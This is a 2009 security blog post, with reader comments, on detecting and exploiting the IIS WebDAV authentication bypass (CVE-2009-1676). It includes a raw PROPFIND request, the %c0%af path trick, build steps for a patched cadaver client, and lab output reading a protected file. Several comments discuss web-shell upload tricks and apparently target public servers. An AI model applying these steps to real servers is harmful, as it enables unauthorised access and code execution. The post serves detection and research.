WebDAV Detection, Vulnerability Checking and Exploitation
Ahoy! My name is Andrew and I've been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676) and helping Ron with writing the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today so I thought I'd jump in where he left off and post a bit about how to detect if WebDAV is enabled and how to actually exploit a folder once you've determined it is vulnerable.
The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is _not_ protected then it's time to break out the funky cold medina and have some fun.
Detecting if WebDAV is enabled
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4
On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.
My method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:
PROPFIND / HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Type: application/xml Content-Length: 298 <?xml version="1.0" encoding="utf-8"?> <propfind xmlns="DAV:"> <prop> <getcontentlength xmlns="DAV:"/> <getlastmodified xmlns="DAV:"/> <executable xmlns="http://apache.org/dav/props/"/> <resourcetype xmlns="DAV:"/> <checked-in xmlns="DAV:"/> <checked-out xmlns="DAV:"/> </prop> </propfind>
When WebDAV is enabled, it should return "HTTP/1.1 207 Multi-Status".
When WebDAV has been disabled, it should return "HTTP/1.1 501 Not Supported".
This is the method I've implemented in the http-iis-webdav-vuln.nse script. It works great in the lab on IIS servers. If we get back anything other than a 207 or 501 then we jump ship saying the web server is not supported. An Ubuntu server running Apache returns a 405 Method Not Allowed for instance.
Checking if a server is vulnerable
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the %c0%af character after the first /. It would turn /secret/ into /%c0%afsecret/.
This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af character can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/.
Finding a vulnerable server
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
Now for the fun part. If you havent turned on some funky cold medina yet, get to it because we're almost done!
First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today btw). Lets see how an nmap scan of this box with the updated script works out:
> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT Interesting ports on xxx.xxx.xxx.xxx: PORT STATE SERVICE 80/tcp open http |_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.
Exploiting it!
Now we could do everything by telnet-ing over port 80, but that's not much fun (believe me, it's very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client but I quickly realized it has a bunch of problems that won't let us do what we wanted. The nice thing about FOSS is that it's open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for awhile, we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:
1) Replace any "Depth: 0" header with "Depth: 1" (otherwise ls won't work)
2) Append the header "Translate: f" to every request (otherwise get and probably others won't work)
3) Insert the characters "%c0%af" into any uri request longer than 1 character.
So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here's the commands:
> mkdir cadaver-h4x > cd cadaver-h4x > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch --snip-- > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz --snip-- > tar xzvf cadaver-0.23.2.tar.gz --snip-- > cd cadaver-0.23.2/ > patch -p1 < ../cadaver-0.23.2-h4x.patch patching file lib/neon/ne_basic.c patching file lib/neon/ne_request.c patching file lib/neon/ne_uri.c > ./configure --snip-- > make --snip--
Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:
> ./cadaver xxx.xxx.xxx.xxx
This should drop you to a "dav:/>" prompt. Now just cd into the vulnerable folder and check out what's there:
dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/': succeeded.
password.txt 7 May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt':
ron$pr0ns
dav:/secret/>
And there you have it!
Here's a list of commands that I've tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE
Oddly enough, the COPY command does NOT work. We didn't have time to investigate why, but the functionality can be duplicated by a get/local rename/put.
Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), so don't try.
If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we've been trying and can't get it to work in the lab here.
Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca
May 22nd, 2009 at 06:46
Isn't it also possible to check if a server has webdav enabled by sending this?
OPTIONS * HTTP/1.0
May 22nd, 2009 at 07:34
Hi Goku,
OPTIONS can detect if it's enabled, but OPTIONS can be disabled (and it's best practise to do so -- I expect that most corporate environments disable it). Our method doesn't rely on OPTIONS, but seems to be totally reliable.
We're planning on using OPTIONS as a backup plan if the '/' folder is password protected, though. At least then we'll have something.
May 22nd, 2009 at 07:37
I can't scan with nmap. I'm using backtrack, Backtrack haven't nsedebug. how to install it
May 22nd, 2009 at 07:58
Goku: That method does not seem to work reliably. It seems there is a way to disable support for a HTTP OPTIONS request on IIS 6.0. See http://seclists.org/nmap-dev/2009/q2/0417.html for more info. That being said, it would be a great idea to add it as a fallback for when the PROPFIND method doesn't work.
May 22nd, 2009 at 08:00
Lotches,
check out the last post regarding nmap for detailed instructions. You can perform an svn update with BT3/4. You can also just reinstall over top, but that's not as helpful and can cause a few problems.
quick solution:
$ mkdir nmapbeta/
$ svn co --username guest --password \\ svn://svn.insecure.org/nmap/ nmapbeta/
$cd nmapbeta; ./configure; make
$ ./nmap --script=http-iis-webdav-vuln xxx.xxx.xxx.xxx
enjoy.
May 22nd, 2009 at 08:12
Hello Matt, my Y!M(YAhoo messenger) is : lotches
MSN : lotches@live.com
Can you talk about this bug ?
May 22nd, 2009 at 08:27
Sometime i got error : |_ http-iis-webdav-vuln: ERROR: Couldn't find folders.lst (should be in nselib/d ata)
May 22nd, 2009 at 08:39
I tried it on IIS 6.0 on our lab.
It was configured like that:
we created a vhost based on a folder browsable by everyone, which contains some txt files accessible only by administrator.
I can browse the folder and its content with a common browser, but when I try to list its content using your patched cadaver, it returns no files, like the folder is empty.
Moreover trying to bypass auth mechanism using unicode attack doesn't work either :(
I followed exactly your tutorial I suppose. Any clues?
Regards.
May 22nd, 2009 at 08:42
Lotches,
just hit the last post before this. That should give you the detailed information to solve these issues.
May 22nd, 2009 at 08:42
@lotches
it is because you dont have folders.lst in the location you mentioned (nselib/data).
I guess you have to create a new one containing the names of folders you want to bruteforce
May 22nd, 2009 at 09:53
@orangepeacock
I'm getting the same results in our lab. I can also browse the contents with a common browser and see there is a file there, but using cadaver (patched and not patched) it does not show the file. Getting the file works (with the patched cadaver), but I'll take a look in a little bit and see what the browser is doing differently than cadaver and try to replicate that in the cadaver patch.
Thanks for the info!
May 22nd, 2009 at 10:06
@rangepeacock : Can you share me some server, i have been searching it but i can't find it :((
May 22nd, 2009 at 10:08
@Math : i saw but i want talk with you.Nice to chat with you
May 22nd, 2009 at 10:30
Hi Lotches,
The instructions are all available in this thread, especially in Matt's post -- I don't think we can do much more to help you.
Ron
May 22nd, 2009 at 10:56
@Lotches
sorry, we are using vmware in LAN.
@Andrew
besides cadaver issue, I cannot get the attack working, regardless the position of the unicode inside the string!
Looks like one does not simply unicode his way into mordor!
May 22nd, 2009 at 15:29
I've successfully been able to upload a phpfile to a webdav server with authentication.
When I then try to do a GET request to execute the phpshell I get the source code instead.
So actually it ain't possible to execute system commands.
Correct me if I'm wrong.
Goku
May 23rd, 2009 at 13:48
i can upload file in the server but i can not upload asp or aspx file,maybe ur server ???
May 23rd, 2009 at 16:17
You have to upload it as a txt file. Then afterwards rename it to .asp
May 23rd, 2009 at 22:32
@Goku
No,i can't,i think server dont accept upload or rename to asp file
[quote]
dav:/> move 1.txt 1.asp
Moving `/1.txt' to `/1.asp': failed:
http://xxxxx.net/1.asp: 403 Forbidden
[/quote]
May 24th, 2009 at 04:09
Some do some don't.
May 24th, 2009 at 12:29
i got this error can someone give me the answer :(
wishnu@stupid:~/nmapbeta$ ./nmap --script=http-iis-webdav-vuln 202.158.15.86
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-25 00:24 WIT
NSE: failed to initialize the script engine:
./nse_main.lua:199: ./http-iis-webdav-vuln.nse:1: '=' expected near '/'
stack traceback:
[C]: in function 'assert'
./nse_main.lua:199: in function 'new'
./nse_main.lua:348: in function 'Entry'
./scripts/script.db:16: in function 'db_closure'
./nse_main.lua:361: in function 'get_chosen_scripts'
./nse_main.lua:504: in main chunk
[C]: ?
QUITTING!
May 24th, 2009 at 18:56
Hi wishnu,
I don't know exactly what your problem is, but try running this command first:
export NMAPDIR=.
That'll tell Nmap to use the current directory for its datafiles, not the system directory. It's important to run that before you run Nmap from a non-system folder.
Hope that helps! If not, I suggest posting to the nmap-dev mailing list.
Ron
May 24th, 2009 at 19:16
what about over SSL? how can i enable ssl?
May 25th, 2009 at 12:56
Thanks man, works great, just today i was on faculty of Informatics and electrotechnics on my university, meet old friend there with Microsoft Server in his office and he challenged me to break into. In less than 10 seconds the work was done an i won a beer :) Cheers
May 25th, 2009 at 13:17
Hi zoot,
Unfortunately, I don't think the tool we modified supports SSL at all...
Ron
May 25th, 2009 at 13:19
@MI1: I think that means you owe us half a beer! ;)
May 25th, 2009 at 17:00
Hi
==================
anderson@ubuntu:~/cadever-h4x/cadaver-0.23.2$ ./cadaver 123.30.51.25
dav:/> cd secret
Could not access /secret/ (not WebDAV-enabled?):
Did not find a collection resource.
dav:/> ls -al
Listing collection `/-al/': collection is empty.
dav:/>
==============================
finish secessful ?
I can't command server
why?
May 25th, 2009 at 17:03
Not find resoucre
Plese help me
=============
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
===================
May 26th, 2009 at 07:25
@anderson: it looks like you're doing it righyt, but that either WebDAV isn't enabled or the folder denies permission to list contents, even with WebDAV.
The only thing I notice is, don't do "ls -al", Cadaver doesn't understand that, just do "ls".
May 26th, 2009 at 08:09
y0
i found cadaver-ssl-0.22.2-1012
im wondering if its possible to patch this one? im werkin on it trying to patch it but im not sure about the version...
May 26th, 2009 at 10:57
@zo0t: It *might* work, I don't really see why it wouldn't.. let me know how it goes :)
May 27th, 2009 at 09:30
i succeeded install it thanks for ur help my friends... o i forgot my name is wishnu from indonesia :D..... nice to meet u all
May 27th, 2009 at 11:02
I can't get the put method work..
dav:/webdav/> get readme.txt
Downloading `/webdav/readme.txt' to readme.txt:
Progress: [=============================>] 100.0% of 27 bytes succeeded.
dav:/webdav/> put readme.txt
Uploading readme.txt to `/webdav/readme.txt':
Progress: [=============================>] 100.0% of 27 bytes failed:
403 Forbidden
dav:/webdav/> cat readme.txt
Displaying `/webdav/readme.txt':
U r not supposed to read me
Is there a special configuration in the virtua directory to have?
Thanks in advance.
May 27th, 2009 at 11:26
Further investigations allowed me to write to the webdav folder only if write permission was enabled.
Is it correct or put method works with read only permission too?
May 27th, 2009 at 13:22
On two three test cases (all sites I tried) the vulnerability did not work. The scanner found the folders as vulnerable
cadaver and issuing the request manually gave either a 404 , or an IIS permissions error. the anonymous user for the site had rights to the private folders. this was iis6.0 and 5.0 with webdav enabled.
sounds like this vulnerability even works on less configurations or something
May 29th, 2009 at 06:52
This vulnerability is valid to smtp iis
June 1st, 2009 at 22:20
Hello!
I've just written a translation about this excellent article. I hope there's no problem (I posted a link to the article). Here's the translation:
http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml
See you!
June 2nd, 2009 at 08:45
@Cortex: Very cool!
Although I didn't technically write the blog (Andrew did), I don't have any issue with a translation. :)
June 2nd, 2009 at 13:40
@cortex: Awesome, the only Spanish I know is 'cerveza por favor', nice work!
June 8th, 2009 at 02:59
Hey, i need help with nmap. When i wanna scan for vuln WebDav:
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-08 09:55 Central Europe D
aylight Time
NSE: failed to initialize the script engine:
C:\WINDOWS\system32\nse_main.lua:370: 'http-iis-webdav-vuln' did not match a cat
egory, filename, or directory
stack traceback:
[C]: in function 'error'
C:\WINDOWS\system32\nse_main.lua:370: in function 'get_chosen_scripts'
C:\WINDOWS\system32\nse_main.lua:503: in main chunk
[C]: ?
QUITTING!
Please help
June 9th, 2009 at 20:03
I have the same trouble!↑
sorry,my bad english!
June 12th, 2009 at 16:45
Hey, when I try to "make" the cadaver application I get an error, well, a list of errors rather talking about how libintl.h is missing and it can't use the "gettext" command or something.
Any help?
June 14th, 2009 at 20:09
Hello,
Im have trouble using cadaver, is it easy to use Metasploit to do the exploit. Can you share some methods in doing it?
June 21st, 2009 at 18:47
dav:/> cat default.asp
Displaying `/default.asp':
Failed: 403 Forbidden
dav:/>
How to display it ? i got a same problem with another file in another IIS. Thanks
July 1st, 2009 at 00:46
hi! i coult get or cat any ASP file, but i can view CSS file. how to get or cat ASP file, thank